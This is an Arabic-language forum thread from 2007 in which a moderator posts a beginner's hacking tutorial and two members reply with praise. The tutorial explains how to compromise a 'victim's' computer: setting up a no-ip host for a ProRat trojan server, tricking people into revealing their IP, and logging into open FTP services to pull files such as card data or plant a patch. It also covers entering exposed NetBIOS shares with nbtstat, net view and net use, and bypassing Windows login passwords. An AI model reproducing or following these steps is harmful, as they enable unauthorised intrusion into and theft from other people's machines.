*****نور الاسلام*****

هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

3 مشترك

    *****هديه للمنتدي *****

    youness italy
    youness italy
    نائب صاحب الموقع
    نائب صاحب الموقع


    عدد الرسائل : 180
    تاريخ التسجيل : 22/08/2007

    *****هديه للمنتدي ***** Empty *****هديه للمنتدي *****

    مُساهمة من طرف youness italy الإثنين 5 نوفمبر 2007 - 13:13

    بسم الله الرحمن الرحيم



    .
    وتدكر ان هدا جزء فقط.
    ونظرا لجمال مواضيع الموقع حبيت اضع هدا الموضوع الدي وف ينفرد به هدا الموقع.
    لدلك ارجو التثبيت.


    اولا يجب قبل البدأ في هدا المجال يجب معرفه:


    1-معرفه لغات البرمجه الاتيه: (لغه السي-لغه البايثون-التعامل مع نظام الوندوس و اللينكس-تعلم لغه الهتمل*-تعلم لغه html-تعلم الphp ) وهدا الاشياء سوف تجدها في المرفقات مع الكتاب.

    نبدا معا lets play

    واولا :مصطلحات هامه في الدوسdos

    Msconfig
    هذا الامر لادوات النظام وشاشة بدء التشغيل
    مهمة الأداة المساعدة لتكوين النظام هي :
    تقوم الأداة المساعدة لتكوين النظام ‎(‎Msconfig.exe)‎‎ بأتمتة الخطوات الروتينية لاستكشاف الأخطاء
    وإصلاحها التي يتّبعها مهندسو الدعم الفني في Microsoft عند تشخيص مسائل تتعلق بتكوين Windows 98‏.
    وتسمح لك هذه الأداة بتعديل تكوين النظام من خلال عملية حذف خانات الاختيار، وتقليل المجازفة بكتابة
    أخطاء مقترنة بشكل مسبق بالمفكرة ومحرر تكوين النظام.
    كما أنه بإمكان الأداة المساعدة لتكوين النظام إنشاء نسخة احتياطية عن ملفات النظام
    قبل أن تبدأ جلسة العمل المخصصة لاستكشاف الأخطاء وإصلاحها.
    وعليك إنشاء نسخ احتياطية عن ملفات النظام لضمان إمكانية عكس التعديلات التي تم إدخالها
    أثناء جلسة العمل المخصصة لاستكشاف الأخطاء .
    وسوف نستخدمه بشكل خاص بالهكر فيما يلي

    Regedit
    هذا الامر للوصول الى الرجستري لعمل بعض التعديلات التي تريدها
    وسوف نستخدمه بشكل خاص بالهكر فيما يلي


    Command
    ايظا لهدا الغرضcmdهذا الامر يقوم بتشغيل شاشة الدوس كما يوجد الامر
    وسوف نستخدمه بشكل خاص بالهكر فيما يلي



    وثانيا:مصطلحات هامه
    ip هو عنوان جهاز الضحيه كما انه برتكول
    server خادم يتم ارساله للضحيه
    client عميل يكون في جهاز الهاك
    منفد port
    scan بحث عن شئ



    Administrator المدير


    .




    ASCII 3 قاعدة المعايير الأمريكية لتبادل المعلومات



    معيار لتحويل الأحرف
    إلى أرقام وتحتوي على سبعة جزيئات بقيمة ثنائية تتراوح بين الصفرو127 .



    Anonymous مجهول


    يتم استخدامه كاسم مستخدم للدخول على بعض الكمبيوترات البعيدة.



    Authentication التوثيق


    تعريف هوية شخص أو الإجراءات الخاصة بذلك.





    Band Width عرض النطاق


    هي كمية المعلومات التي يمكنك إرسالها على خط معين في وقت محدد
    Bits per Second وتكتب



    BBS لوحة إعلانات النظام


    كمبيوتر مزود ببرامج معينة يوفر رسائل إلكترونية وملفات إضافة للخدمات
    الأخرى.




    Binary ثنائي

    تستخدم0و1 وهي الوسيلة التي يعمل بها الكمبيوتر
    وتحتوي الملفات الثنائية على ثمان جزئيات تتراوح بين صفر و255




    Browser متصفح


    برنامج يستخدم للإبحار في الشبكة العنكبوتية WWW.










    Compression ضغط






    Connectionربط


    .




    Crack تخريب


    مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة وجعله مجاني.



    Cracker مخرب


    شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار.



    Data بيانات





    Default بديل افتراضي


    قيمة أو فعل أو ترتيب يقوم الكمبيوتر بافتراضه في حال عدم قيام المستخدم
    بإعطاء تعليمات صريحة بخلاف ذلك. هذا النظام يمنع البرنامج من التعطل أو
    الاصطدام في حال عدم إعطاء قيمة بواسطة المستخدم.



    Device جهاز



    Dial-up اتصال



    Domain حقل


    هو ذلك الجزء من الـ DNS الذي يحدد مكان شبكة كمبيوترك وموقعها في العالم




    DNS نظام أسماء الحقول


    هو نظام لتحديد العناوين الشبكية



    Electronic Mail البريد الالكتروني




    Emotion رموز المشاعر


    رموز تستخدم للتعبير عن المشاعر على الانترنت « ابتسامة ، غضب »




    Encryption التشفير





    FAQs الأسئلة المتكررة


    وثيقة على الانترنت الغرض منها فحص وتدقيق
    المعلومات التي يحتاج إليها الكثير من الأشخاص بصفة متكررة.



    Firewall جدار نار


    نظام تأمين لتقييد عملية الدخول على الكمبيوترات الموجودة على شبكة محلية
    LAN من أي مكان في الخارج.





    Gopher خدمة جوفر


    نظام طورته جامعة مينيسوتا الأمريكية بهدف تسهييل عملية استخدام الانترنت
    وهو يعتمد على عملية البحث من خلال القوائم لقراءة الوثائق ونقل الملفات.





    Hacker متطفل



    Host مضيف

    للكمبيوتر الذي يتيح للمستخدمين
    الدخول عليه.




    HTTP بروتوكول نقل النص التشعبي


    هي وسيلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتيه،


    ISDN الشبكة الرقمية للخدمات الموحدة

    هي تكنولوجيا جديدة تحتوي على
    شبكات صوتية ورقمية في وسيلة واحدة وتعتبر خدمة اتصالات فائقة السرعة.









    ISP مقدم خدمة الانترنت






    JPEG

    وسيلة لضغط الصور المستخدمة في الانترنت




    Layer طبقة





    Login تسجيل




    Log off انهاء عملية التسجيل




    Lurking التواري


    يستخدم هذا المصطلح للتعبير عن شخص ليس لديه مشاركة نشطة في مجموعة
    الاخبار او لوحة النقاش أو قائمة البريد التي اشترك معها، ويفضل التواري
    للأشخاص المبتدئين الذين يريدون التأقلم في البداية مع الآخرين






    Mailing List قائمة بريد






    MIME توصيلة بريد الانترنت المتعددة الأغراض


    نظام لتوفير القدرة على نقل
    البيانات

    kimoaledoo@yahoo.com************************************************** ********************************************
    اولا هكر الاجهزه

    كي تخترق جهاز شخص يجب توافر:
    1-عنوان جهاز الضحيه ip
    2-منفد مفتوح في جهاز الضحيه


    اولا عنوان جهاز الضحيه ip


    ويتضمنأربع خانات وهذه إحدى الأمثلة
    112.0.1.255
    255.45.7.1
    12.245.54.1
    1.24.57.13


    ثانيا المنفد port


    وهو حلقه الوصل بين جهازك وجهاز الضحيه
    ويتم فتحه عن طريق الخادم(server)



    كي تتعلم اختراق جهاز شخص يجب:

    1-ان تتابع كل جديد في البرامج وتتعلمه
    2-كيفيه التعامل مع برامج الهاك والبتشات
    3-كيفيه الاختراق بدون باتشات
    4-تعلم انشاء اي بي ثابت
    5-كيفيه المحافظه علي نفسك قبل ان تخترق
    6-تعلم استخراج ايبي الضحيه




    اولا تعلم كيف تنشا ايبي ثابت

    1-ادهب الي الموقعwww.no-ip.com
    2-اشترك فيه وقم بتفعيل الرساله من البريد.
    3-قم بالدخول علي الوقع مره اخري
    4-اضعظ add
    5-قم بادخال الايبي الثابت
    6-ثم اضغط اسفل الصفحهcreat host

    ************************************************** **************
    ثانيا كيفيه المحافظه علي نفسك


    1-معرفه وجود برامج التجسس في جهازك
    (1)

    ثم start

    RUN

    اكتب

    regedit

    ثم اضغط على اوكى
    HKEY_LOCAL_MACHINE

    ثم

    Software

    ثم

    Microsoft

    ثم

    Windows

    ثم

    CurrentVersion

    ثم

    Run او Run Once
    وانظر الي يمين الشاشه فادا رايت في اليمبن خالص ملف ليس له اسم فهدا هو البتش

    (2)
    start
    ثم

    Run

    اكتب

    msconfig
    اختر

    Statup
    وادا رايت ملف غريب عليك لم تقم يتنزيله فهو البتش

    (3)
    start
    ثم
    run
    اكتب
    system.ini

    فادا وجدت في السطر الخامس
    user.exe=user.exe
    فانت اخترقت


    1-انصحك حمايه نفسك بالfire wall مثل برنامج ZONE ALARM
    2- استخدم النورتن +البرامج غير المعروفه وخاصه الروسيهspyware
    3-استخدم الديب فريز
    4-لا اتفق مع من يقولون ادكر اسمك الحقيقي في المنتديات او عندما تعلن عن عمليه اختراق ولكن يتوجب عليك التخفي لدواعي امنيه
    ************************************************** *****


    ثالثا كيفيه استخراج ايبي الضحيه

    1- ارسال ملف صوتي او فيديو للضحيه بعدين نزهب للدوس
    start
    run
    cmd or command
    netstat



    فيظهر رقم لاي بي في النصف اخر واحد
    تحت foreign address

    2-يرسل لك رساله بالهوتميل بعدين لما توصلك روح لoptions الخاص بالهوتميل
    و اخر واحده علي اليمينMail Display Settings اخترها
    ونشط full بالتعليم عليها من
    Message Headers
    3-عن طريق برنامج

    يجب في هده الطريقه توافر
    1-الجدار الناري
    2-برنامجURLENCODE


    والطريقه كلاتي
    1-استخرج رقم الايبي بتاعك
    start
    run
    cmd or command
    ipconfig

    2- الان استخدم البرنامج
    ضع في الخانه الاولي الايبي بتاعك
    ثم اضغط encode

    سوف يظهر لك في الخانه الثانيه عنوان ابعته للضحيه
    واول ما يضغط عليه سوف تصل لك رساله من الجدار الناري فيها ايبي الضحيه (تقول لك هل تسمح بالدخول له)
    انقلها ثم ارفض الدخول

    ************************************************** ***********************

    *حبيت اضيف نقطه هامه ممكن تفيدك


    فك كلمات سر الكمبيوتر المحمي بكلمه سر






    الطريقه الأولى:

    قم بإدخال ما بين القوسين [ award-sw ] بدلاً من الرقم الأصلي
    ونسبة نجاحه كبيرة جداً في عملية الفتح

    الطريقه الثانيه:

    اخرج البطاريه من الكاسه ثم ضعها في مكانها مره اخري

    >> الطريقتين الأولتين ما أتوقع فيهم جدوى بس أنا قلتهم للأمانه أما الطريقتين اللي بعد كذا ينفعوا خصوصا الطريقه الثالثه ..


    (3)

    اول متخش اضغط اف 8 بعدين اختار سيف مود بعدين غير جيست الي

    admin

    (4)

    وهي اول ماتفتح الكمبيوتر راح تجيك شاشه الترحيب يقولك اضغط على الاسم وادخل الرقم السري
    اوكيه
    حلو لاتدخل الرقم اضغط على الت وكنترول ودليت
    لما تجيك شاشه سوداء مكتوب فيها الاسم طبعا انت امسحه واكتب
    مكان النيم الي هو الاسم Administrator
    والباسورد الي هو الرقم السري لاتحط شي خليه فاضي اضغط انتر
    اذا مارضي يدخل اكتب PASSWORD


    *************************************
    رابعا فن التعامل مع البتشات و برامح الهاك


    1-برنامج الهكر ينقسم الي
    a)edit server وده الي سيدتك هتعمل منه البتش وتبعته
    b)dll ودي ملفات مع البرنامج

    c)source وده الي هتتحكم منه

    2-عشان تجهز البتش
    -وقف برامج الحمايه
    -المطاليب برنامج
    stripper and superscan and prorat


    )لاحظ ان هده البرامج للتدريب ومن الافضل استخدام برامج من صنعك او برامج اقل شهره)

    اولا برنامجprorat

    ثانيا برنامج stripper

    ثالثا برنامج superscan


    **********************************************
    *حبيت اضيف نقطه هتفيدك بادن الله
    1-http://neworder.box.sk/ الموقع ده مفيد جدا تكتب اي موقع فيه او منتدي او حتي برنامج ويعطيك ثغراته.(يتم دلك من خلال IIS او apache)
    2http://www.ussrback.com الموقع ده ايضا مفيد جدا يعطيك جميع ثغرات الانظمه
    (ودلك من خلالexploits علي اليسار وتختار اول واحده

    3-استرجاع الايميلات المحزوفه من الماسينجر بشرط انك لم تعمل فورمات لجهازك


    Start
    Run
    اكتب
    REGEDIT
    اوجد
    HKEY_CURRENT_US
    ERS\Software\Mi
    crosoft\
    MessengerServic
    e\ListCache\MSN
    MessengerServic
    e
    تجد سوف
    allow, block, contact, and reverse
    اختاربعد الضغط علي الزر الايمن للموس علي الخانه السابقه
    .Modify
    و تجد نص تكست hex
    سوف تجد الايميلات في الكست.


    ************************************************** ***********
    خامسا كيفيه الاختراق بدون باتشات


    اولا نقط ضعف المانفد
    1-عن طريق الftb

    ما هو الفوتب؟
    هو بورت مفتوح لدي الضحيه يتم من خلاله الدخول لجهاز الضحيه بطريقه غير شرعيه
    وعشان تخترق بهده العمليه يجب عليك التاكد من ان هدا البورت مفنوح في حهاز الضحيه
    وطبعا هنستخد الsuper scan لمعرفه دلك

    الخطوات lets play!
    1-start
    2-run
    3-ftp -n
    4-write (open)
    5-write (victim's ip)
    -if you get this replay(Connected to www.assassin.com
    220 websrv1 Microsoft FTP Service (Version 4.0(.

    so you must continue
    write( quote user ftp)


    if you get this replay (331 Anonymous acces allowed, send identify (e-mail name) as password)

    so you must contiune
    write (quote cwd ~root)

    if you get this replay(530 Please login with USER and PASS)

    so you must contiune
    write(quote pass ftp)

    if you get this replay(230 Anonymous user logged in)

    so you finished work

    بعد ماخلصت لازم تكون عارف اوامر الftp


    اوامر الفوتب:



    Pwd
    عشان تعرف ما يحتويه الهارد ديسك عند الضحية

    Cd
    مثال

    Cd visacard

    في هذا المثال قمت بإقتحام المجلد المسمي
    visacard

    Ls
    لكي يتضح لك محتوى المجلد أو الهارد ديسك

    Get
    امر الحصول على اى ملف من جهاز الضحية الى سطح المكتب بجهازك - مثال

    Get visacard (example)

    Put
    العكس ان تأخد ملف من سطح المكتب بجهازك و تضعه في في جهاز الضحية - مثال

    Put patch (example)

    Close
    لقطع الإتصال مع الضحية





    ثانيا نقط ضعف البرتوكلات

    2-عن طريق نيتبويس(netbois) ويستخدم المنافد 137 و 138 و 139

    ما هو النيت بويس؟
    هو برتكول يمكن من خلاله اختراق جهاز شخص بطريقه غير شرعيه



    الخطوات lets paly!

    1-لازم نتاكد من ان المنافد 137 138 139 مفتوحه
    لدلك هنستخدم الsuper scan
    نعمل اسكان وناخد الايبي المصاب عشان نطبق غليه

    2-start
    3-run
    4-cmd or command
    5-write(nbtstat -A+victim's ip)
    example : nbstat -A127.0.0.1


    if victim is sharing
    so you must contiune

    6-write (net view\\+victim's ip)
    example : net view\\127.0.0.1

    if the system was'nt protected
    you are finished

    الان انت انتهيت من الاختراق

    ولكن ينقص عليك الدخول لجهاز الضحيه
    1-start
    2-run
    3-write (\\+victims ip)
    or net use c: \+victims ip+the name of(C or D or K or L.......)
    ابن الاسلام
    ابن الاسلام
    مشرف على قسم الاعجاز
    قسم الفتاوى
    المواضيع الدينية
    مشرف على قسم الاعجاز  قسم الفتاوىالمواضيع الدينية


    ذكر عدد الرسائل : 166
    اسم الدولة : *****هديه للمنتدي ***** Female12
    تاريخ التسجيل : 26/08/2007

    *****هديه للمنتدي ***** Empty رد: *****هديه للمنتدي *****

    مُساهمة من طرف ابن الاسلام الخميس 8 نوفمبر 2007 - 7:00

    بارك الله فيك اخي على الجديد
    مجهود رائع
    المشتاق للجنة
    المشتاق للجنة
    مشرف عام
    مشرف عام


    ذكر عدد الرسائل : 130
    اسم الدولة : *****هديه للمنتدي ***** Female12
    تاريخ التسجيل : 19/09/2007

    *****هديه للمنتدي ***** Empty رد: *****هديه للمنتدي *****

    مُساهمة من طرف المشتاق للجنة الثلاثاء 13 نوفمبر 2007 - 14:27

    *****هديه للمنتدي ***** 6945_113

      الوقت/التاريخ الآن هو الخميس 21 نوفمبر 2024 - 3:13